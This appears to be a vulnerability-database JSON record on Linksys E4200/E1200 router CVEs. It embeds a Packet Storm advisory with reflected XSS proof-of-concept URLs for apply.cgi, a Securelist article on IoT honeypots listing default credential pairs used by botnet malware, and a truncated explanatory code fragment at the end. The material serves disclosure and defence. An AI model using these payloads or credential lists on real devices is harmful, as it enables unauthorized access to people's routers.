"confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-02-18T17:15:00", "title": "CVE-2013-2679", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2679"], "modified": "2020-02-27T16:58:00", "cpe": ["cpe:/o:belkin:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2679", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2679", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:belkin:linksys_e4200_firmware:1.0.05:build7:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:52", "description": "Cisco Linksys E4200 1.0.05 Build 7 devices contain an Information Disclosure Vulnerability which allows remote attackers to obtain private IP addresses and other sensitive information.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, 
"published": "2020-02-06T21:15:00", "title": "CVE-2013-2683", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2683"], "modified": "2020-02-07T13:58:00", "cpe": ["cpe:/o:cisco:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2683", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2683", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:cisco:linksys_e4200_firmware:1.0.05:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:52", "description": "Cisco Linksys E4200 1.0.05 Build 7 devices contain a Clickjacking Vulnerability which allows remote attackers to obtain sensitive information.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-02-05T21:15:00", "title": "CVE-2013-2682", "type": "cve", "cwe": ["CWE-1021"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", 
"integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2682"], "modified": "2020-02-07T14:30:00", "cpe": ["cpe:/o:cisco:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2682", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2682", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:cisco:linksys_e4200_firmware:1.0.05:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:52", "description": "Cisco Linksys E4200 1.0.05 Build 7 devices contain a Security Bypass Vulnerability which could allow remote attackers to gain unauthorized access.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-05T21:15:00", "title": "CVE-2013-2681", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2681"], "modified": "2020-02-07T14:40:00", "cpe": ["cpe:/o:cisco:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2681", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2681", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:cisco:linksys_e4200_firmware:1.0.05:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:52", "description": "Cisco Linksys E4200 1.0.05 Build 7 routers contain a Local File Include Vulnerability which could allow remote attackers to obtain sensitive information or execute arbitrary code by sending a crafted URL request to the apply.cgi script using the submit_type parameter.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-04T15:15:00", "title": "CVE-2013-2678", "type": "cve", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2678"], "modified": "2020-02-07T14:23:00", "cpe": ["cpe:/o:cisco:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2678", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2678", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:cisco:linksys_e4200_firmware:1.0.05:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:52", "description": 
"Cross-site Scripting (XSS) in Cisco Linksys E4200 1.0.05 Build 7 devices allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-02-06T21:15:00", "title": "CVE-2013-2684", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2684"], "modified": "2020-02-07T13:25:00", "cpe": ["cpe:/o:cisco:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2684", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2684", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:cisco:linksys_e4200_firmware:1.0.05:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:21:09", "description": "", "published": "2013-07-10T00:00:00", "type": "packetstorm", "title": "Cisco Linksys E1200 / N300 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2679"], "modified": "2013-07-10T00:00:00", "id": "PACKETSTORM:122342", "href": "https://packetstormsecurity.com/files/122342/Cisco-Linksys-E1200-N300-Cross-Site-Scripting.html", 
"sourceData": "`Summary \n-------------------- \nSoftware : Cisco/Linksys Router OS \nHardware : E1200 N300 (others currently untested) \nVersion : 2.0.04 (others currently untested) \nWebsite : http://www.linksys.com \nIssue : Reflected XSS \nSeverity : Medium \nResearcher: Carl Benedict (theinfinitenigma) \n \nProduct Description \n-------------------- \nThe Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch. \n \nDetails \n-------------------- \nThe apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful. \n \nSample URL #1 (HTTP GET request): \n \nhttp://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27 \n \nSample URL #2 (HTTP GET request): \n 
\nhttp://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1 \n \nHistory \n-------------------- \n04/26/2013 : Discovery \n04/27/2013 : Advisory released \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/122342/ciscolinksyse1200-xss.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-2679"], "description": "\r\n\r\nMitre has assigned the following CVE for this issue:\r\n\r\nCVE-2013-2679\r\n\r\nOn Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict\r\n<theinfinitenigma@gmail.com> wrote:\r\n> Summary\r\n> --------------------\r\n> Software : Cisco/Linksys Router OS\r\n> Hardware : E1200 N300 (others currently untested)\r\n> Version : 2.0.04 (others currently untested)\r\n> Website : http://www.linksys.com\r\n> Issue : Reflected XSS\r\n> Severity : Medium\r\n> Researcher: Carl Benedict (theinfinitenigma)\r\n>\r\n> Product Description\r\n> --------------------\r\n> The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, 
and 10/100 switch.\r\n>\r\n> Details\r\n> --------------------\r\n> The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful.\r\n>\r\n> Sample URL #1 (HTTP GET request):\r\n>\r\n> http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27\r\n>\r\n> Sample URL #2 (HTTP GET request):\r\n>\r\n> http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1\r\n>\r\n> History\r\n> --------------------\r\n> 04/26/2013 : Discovery\r\n> 04/27/2013 : Advisory released\r\n>\r\n>\r\n> --\r\n> ?\r\n\r\n\r\n\r\n-- ?\r\n", "edition": 1, "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:DOC:29559", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:DOC:29559", "title": "Re: Cisco/Linksys E1200 N300 Reflected XSS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "cvelist": ["CVE-2013-2679", "CVE-2013-3568"], "description": "Crossite request forgery, XSS, code execution in web administration interface.", "edition": 1, "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:VULN:13169", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13169", "title": "Linksys routers security vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2017-06-30T15:02:31", "bulletinFamily": "blog", "cvelist": ["CVE-2013-2678", "CVE-2014-9727", "CVE-2014-6271"], "description": "\n\nThere were a number of incidents in 2016 that triggered increased interest in the security of so-called IoT or 'smart' devices. They included, among others, the [record-breaking](<https://www.scmagazineuk.com/ovh-suffers-11tbps-ddos-attack/article/532197/>) DDoS attacks against the French hosting provider OVH and the US DNS provider Dyn. These attacks are known to have been launched with the help of a massive botnet made up of routers, IP cameras, printers and other devices.\n\nLast year the world also learned of a colossal botnet made up of [nearly five million routers](<http://uk.pcmag.com/talktalk/86457/news/bestbuy-hacker-apologies-for-talktalk-and-post-office-hack-b>). The German telecoms giant Deutsche Telekom also encountered router hacking after the devices used by the operator's clients became infected with [Mirai](<https://securelist.com/76954/is-mirai-really-as-black-as-its-being-painted/>). 
The hacking didn't stop at network hardware: security problems were also detected in smart [Miele dishwashers](<https://motherboard.vice.com/en_us/article/a-hackable-dishwasher-is-connecting-hospitals-to-the-internet-of-shit>) and [AGA stove](<https://www.pentestpartners.com/security-blog/iot-Aga-cast-iron-security-flaw/>)s. The 'icing on the cake' was the [BrickerBot](<https://techcrunch.com/2017/04/25/brickerbot-is-a-vigilante-worm-that-destroys-insecure-iot-devices/>) worm that didn't just infect vulnerable devices like most of its 'peers' but actually rendered them fully inoperable.\n\n[](<https://securelist.com/files/2017/06/IOT2017_Timeline_EN.png>)\n\nAccording to Gartner, there are currently over 6 billion IoT devices on the planet. Such a huge number of potentially vulnerable gadgets could not possibly go unnoticed by cybercriminals. As of May 2017, Kaspersky Lab's collections included several thousand different malware samples for IoT devices, about half of which were detected in 2017.\n\n[](<https://securelist.com/files/2017/06/IOT_malware_collection_EN.png>)\n\n_The number of IoT malware samples detected each year (2013 \u2013 2017)_\n\n## Threat to the end user\n\nIf there is an IoT device on your home network that is poorly configured or contains vulnerabilities, it could cause some serious problems. The most common scenario is your device ending up as part of a botnet. This scenario is perhaps the most innocuous for its owner; the other scenarios are more dangerous. For example, your home network devices could be used to perform illegal activities, or a cybercriminal who has gained access to an IoT device could spy on and later blackmail its owner \u2013 we have already heard of such things happening. Ultimately, the infected device can be simply broken, though this is by no means the worst thing that can happen. 
\n\n## The main problems of smart devices\n\n#### Firmware\n\nIn the best-case scenario, device manufacturers are slow to release firmware updates for smart devices. In the worst case, firmware doesn't get updated at all, and many devices don't even have the ability to install firmware updates.\n\nSoftware on devices may contain errors that cybercriminals can exploit. For example, the Trojan PNScan (Trojan.Linux.PNScan) attempted to hack routers by exploiting one of the following vulnerabilities:\n\n * CVE-2014-9727 for attacking Fritz!Box routers;\n * A vulnerability in HNAP (Home Network Administration Protocol) and the vulnerability CVE-2013-2678 for attacking Linksys routers;\n * ShellShock (CVE-2014-6271).\n\nIf any of these worked, PNScan infected the device with the [Tsunami](<https://threats.kaspersky.com/en/threat/Backdoor.Linux.Tsunami>) backdoor.\n\nThe Persirai Trojan exploited a vulnerability present in over 1000 different models of IP cameras. When successful, it could run arbitrary code on the device with super-user privileges. \n\nThere's yet another security loophole related to the [implementation of the TR-069 protocol](<https://isc.sans.edu/forums/diary/TR069+NewNTPServer+Exploits+What+we+know+so+far/21763/>). This protocol is designed for the operator to remotely manage devices, and is based on SOAP which, in turn, uses the XML format to communicate commands. A vulnerability was detected within the command parser. This infection mechanism was used in some versions of the Mirai Trojan, as well as in [Hajime](<https://securelist.com/78160/hajime-the-mysterious-evolving-botnet/>). This was how Deutsche Telekom devices were infected.\n\n### Passwords, telnet and SSH\n\nAnother problem is preconfigured passwords set by the manufacturer. They can be the same not just for one model but for a manufacturer's entire product range. 
Furthermore, this situation has existed for so long that the login/password combinations can easily be found on the Internet \u2013 something that cybercriminals actively exploit. Another factor that makes the cybercriminal's work easier is that many IoT devices have their telnet and/or SSH ports available to the outside world.\n\nFor instance, here is a list of login/password combinations that one version of the Gafgyt Trojan (Backdoor.Linux.Gafgyt) uses:\n\nroot | root \n---|--- \nroot | - \ntelnet | telnet \n!root | - \nsupport | support \nsupervisor | zyad1234 \nroot | antslq \nroot | guest12345 \nroot | tini \nroot | letacla \nroot | Support1234 \n \n## Statistics\n\nWe set up several honeypots (traps) that imitated various devices running Linux, and left them connected to the Internet to see what happened to them 'in the wild'. The result was not long in coming: after just a few seconds we saw the first attempted connections to the open telnet port. Over a 24-hour period there were tens of thousands of attempted connections from unique IP addresses.\n\n[](<https://securelist.com/files/2017/06/attacks.png>)\n\n_Number of attempted attacks on honeypots from unique IP addresses. January-April 2017._\n\nIn most cases, the attempted connections used the telnet protocol; the rest used SSH.\n\n[](<https://securelist.com/files/2017/06/telnet-ssh.png>)\n\n_Distribution of attempted attacks by type of connection port used. 
January-April 2017_\n\nBelow is a list of the most popular login/password combinations that malware programs use when attempting to connect to a telnet port:\n\n**User** | **Password** \n---|--- \nroot | xc3511 \nroot | vizxv \nadmin | admin \nroot | admin \nroot | xmhdipc \nroot | 123456 \nroot | 888888 \nroot | 54321 \nsupport | support \nroot | default \nroot | root \nadmin | password \nroot | anko \nroot | \nroot | juantech \nadmin | smcadmin \nroot | 1111 \nroot | 12345 \nroot | pass \nadmin | admin1234 \n \nHere is the list used for SSH attacks. As we can see, it is slightly different.\n\n**User** | **Password** \n---|--- \n**admin** | default \n**admin** | admin \n**support** | support \n**admin** | 1111 \n**admin** | \n**user** | user \n**Administrator** | admin \n**admin** | root \n**root** | root \n**root** | admin \n**ubnt** | ubnt \n**admin** | 12345 \n**test** | test \n**admin** | <Any pass> \n**admin** | anypass \n**administrator** | \n**admin** | 1234 \n**root** | password \n**root** | 123456 \n \nNow, let's look at the types of devices from which the attacks originated. Over 63% of them could be identified as DVR services or IP cameras, while about 16% were different types of network devices and routers from all the major manufacturers. 1% were Wi-Fi repeaters and other network hardware, TV tuners, Voice over IP devices, Tor exit nodes, printers and 'smart-home' devices. About 20% of devices could not be identified unequivocally.\n\n[](<https://securelist.com/files/2017/06/Infographic.png>)\n\n_Distribution of attack sources by device type. January-April 2017_\n\nMost of the IP addresses from which attempted connections arrived at our honeypots respond to HTTP requests. Typically, there are several devices using each IP address (NAT technology is used). 
The device responding to the HTTP request is not always the device that attacked our honeypot, though that is usually the case.\n\nThe response to such a request was a web page \u2013 a device control panel, some form of monitoring, or maybe a video from a camera. With this returned page, it is possible to try and identify the type of device. Below is a list of the most frequent headers for the web pages returned by the attacking devices:\n\n**HTTP Title** | **Device %** \n---|--- \nNETSurveillance WEB | 17.40% \nDVR Components Download | 10.53% \nWEB SERVICE | 7.51% \nmain page | 2.47% \nIVSWeb 2.0 - Welcome | 2.21% \nZXHN H208N V2.5 | 2.04% \nWeb Client | 1.46% \nRouterOS router configuration page | 1.14% \nNETSuveillance WEB | 0.98% \nTechnicolor | 0.77% \nAdministration Console | 0.77% \nM\u00f3dem - Inicio de sesi\u00f3n | 0.67% \nNEUTRON | 0.58% \nOpen Webif | 0.49% \nhd client | 0.48% \nLogin Incorrect | 0.44% \niGate GW040 GPON ONT | 0.44% \nCPPLUS DVR - Web View | 0.38% \nWebCam | 0.36% \nGPON Home Gateway | 0.34% \n \nWe only see a portion of the attacking devices at our honeypots. If we need an estimate of how many devices there are globally of the same type, dedicated search services like Shodan or ZoomEye can help out. They scan IP ranges for supported services, poll them and index the results. We took some of the most frequent headers from IP cameras, DVRs and routers, and searched for them in ZoomEye. The results were impressive: millions of devices were found that potentially could be (and most probably are) infected with malware. 
\n\nNumbers of IP addresses of potentially vulnerable devices: IP cameras and DVRs.\n\n**HTTP Title** | **Devices** \n---|--- \nWEB SERVICE | 2 785 956 \nNETSurveillance WEB | 1 621 648 \ndvrdvs | 1 569 801 \nDVR Components Download | 1 210 111 \nNetDvrV3 | 239 217 \nIVSWeb | 55 382 \n**Total** | **7 482 115** \n \nNumbers of IP addresses of potentially vulnerable devices: routers\n\n**HTTP Title** | **Devices** \n---|--- \nEltex NTP | 2 653 \nRouterOS router | 2 124 857 \nGPON Home Gateway | 1 574 074 \nTL-WR841N | 149 491 \nZXHN H208N | 79 045 \nTD-W8968 | 29 310 \niGate GW040 GPON ONT | 29 174 \n**Total** | **3 988 604** \n \nAlso noteworthy is the fact that our honeytraps not only recorded attacks coming from network hardware classed as home devices but also enterprise-class hardware.\n\nEven more disturbing is the fact that among all the IP addresses from which attacks originated there were some that hosted monitoring and/or device management systems with enterprise and security links, such as:\n\n * Point-of-sale devices at stores, restaurants and filling stations\n * Digital TV broadcasting systems\n * Physical security and access control systems\n * Environmental monitoring devices\n * **Monitoring at a seismic station in Bangkok **\n * **Industry-grade programmable microcontrollers **\n * **Power management systems**\n\nWe cannot confirm that it is namely these types of devices that are infected. However, we have seen attacks on our honeypots arriving from the IP addresses used by these devices, which means at least one or more devices were infected on the network where they reside.\n\n### Geography of infected devices\n\nIf we look at the geographic distribution of the devices with the IP addresses that we saw attacking our honeypots, we see the following:\n\n[](<https://securelist.com/files/2017/06/Attacks_by_countries_EN.png>)\n\n_Breakdown of attacking device IP addresses by country. 
January-April 2017_\n\nAs we mentioned above, most of the infected devices are IP cameras and DVRs. Many of them are widespread in China and Vietnam, as well as in Russia, Brazil, Turkey and other countries.\n\n### Geographical distribution of server IP addresses from which malware is downloaded to devices\n\nSo far in 2017, we have recorded over 2 million hacking attempts and more than 11,000 unique IP addresses from which malware for IoT devices was downloaded.\n\nHere is the breakdown by country of these IP addresses (Top 10):\n\n**Country** | **Unique IPs** \n---|--- \nVietnam | 2136 \nTaiwan, Province of China | 1356 \nBrazil | 1124 \nTurkey | 696 \nKorea, Republic of | 620 \nIndia | 504 \nUnited States | 429 \nRussian Federation | 373 \nChina | 361 \nRomania | 283 \n \nIf we rank the countries by the number of downloads, the picture changes:\n\n**Country** | **Downloads** \n---|--- \nThailand | 580267 \nHong Kong | 367524 \nKorea, Republic of | 339648 \nNetherlands | 271654 \nUnited States | 168224 \nSeychelles | 148322 \nFrance | 68648 \nHonduras | 36988 \nItaly | 20272 \nUnited Kingdom | 16279 \n \nWe believe that this difference is due to the presence in some of these countries of bulletproof servers, meaning it's much faster and easier to spread malware than it is to infect IoT devices.\n\n### Distribution of attack activity by days of the week\n\nWhen analyzing the activities of IoT botnets, we looked at certain parameters of their operations. We found that there are certain days of the week when there are surges in malicious activity (such as scanning, password attacks, and attempted connections).\n\n[](<https://securelist.com/files/2017/06/week.png>)\n\n_Distribution of attack activity by days of the week. April 2017_\n\nIt appears Monday is a difficult day for cybercriminals too. 
We couldn't find any other explanation for this peculiar behavior.\n\n## Conclusion\n\nThe growing number of malware programs targeting IoT devices and related security incidents demonstrates how serious the problem of smart device security is. 2016 has shown that these threats are not just conceptual but are in fact very real. The existing [competition in the DDoS market](<https://securelist.com/78285/ddos-attacks-in-q1-2017/>) drives cybercriminals to look for new resources to launch increasingly powerful attacks. The Mirai botnet has shown that smart devices can be harnessed for this purpose \u2013 already today, there are billions of these devices globally, and by 2020 their number will grow to 20-50 billion devices, according to predictions by analysts at different companies.\n\nIn conclusion, we offer some recommendations that may help safeguard your devices from infection:\n\n 1. Do not allow access to your device from outside of your local network, unless you specifically need it to use your device;\n 2. Disable all network services that you don't need to use your device;\n 3. If the device has a preconfigured or default password and you cannot change it, or a preconfigured account that you cannot deactivate, then disable the network services where they are used, or disable access to them from outside the local network.\n 4. Before you start using your device, change the default password and set a new strong password;\n 5. 
Regularly update your device's firmware to the latest version (when such updates are available).\n\nIf you follow these simple recommendations, you'll protect yourself from a large portion of existing IoT malware.", "modified": "2017-06-19T09:08:27", "published": "2017-06-19T09:08:27", "href": "https://securelist.com/honeypots-and-the-internet-of-things/78751/", "id": "SECURELIST:6FF73BA3D8BB759BAC6F6A8B20F0F19D", "title": "Honeypots and the Internet of Things", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
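The E1200 advisory reproduced above (PACKETSTORM:122342, CVE-2013-2679) gives a reflected XSS payload for apply.cgi's `submit_button` parameter but not the page source it lands in. The payload `'; </script><script>alert(1)</script> '` only works if the parameter is echoed into an inline script as a single-quoted JavaScript string, so that sink is modelled here. This is an added example, not code from the advisory or from the Linksys firmware; `TEMPLATE`, `PAGE_NAME` and the two fixes are assumptions used to show why the payload escapes the string and what a correct sink looks like.

```python
"""Model of the apply.cgi reflected XSS described in the E1200 advisory above.

Added example: this is not code from the advisory or from the Linksys firmware.
The sink is an ASSUMPTION: the advisory's payload ('; </script><script>...)
only makes sense if submit_button is echoed into an inline <script> as a
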